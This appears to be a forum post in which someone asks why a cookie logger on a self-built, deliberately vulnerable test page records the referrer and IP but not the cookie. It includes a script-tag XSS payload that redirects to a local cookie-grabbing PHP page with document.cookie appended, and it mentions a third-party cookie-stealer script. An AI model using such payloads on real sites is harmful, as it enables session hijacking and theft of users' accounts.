Help with My XSS
Ive been recently playing around with a little web page i set up on my other computer and playing around with the effects of XSS
I have a basic search bar and made it vuln to XSS
what I put in the search bar redirects it to my cookie logger
the problem is its not logging the cookies…..Im using system meltdowns cookie stealer and I have changed the permisions so it can read and write by anyone….
<script>window.location=""http://localhost/xss/cookie.php?cookie="+document.cookie;</script>
thats the code im puting into my search bar it sends me to my page and my cookie grabber but it wont grab the cookie solutions ideas anyone?
and yes I have cookies enabled and it tells me the referer just not the cookie =(
and yes Ive read alot through google and milw0rm about xss
thats what im getting for the referrer and still no cookie though just the ip date and referrer anymore suggestions =0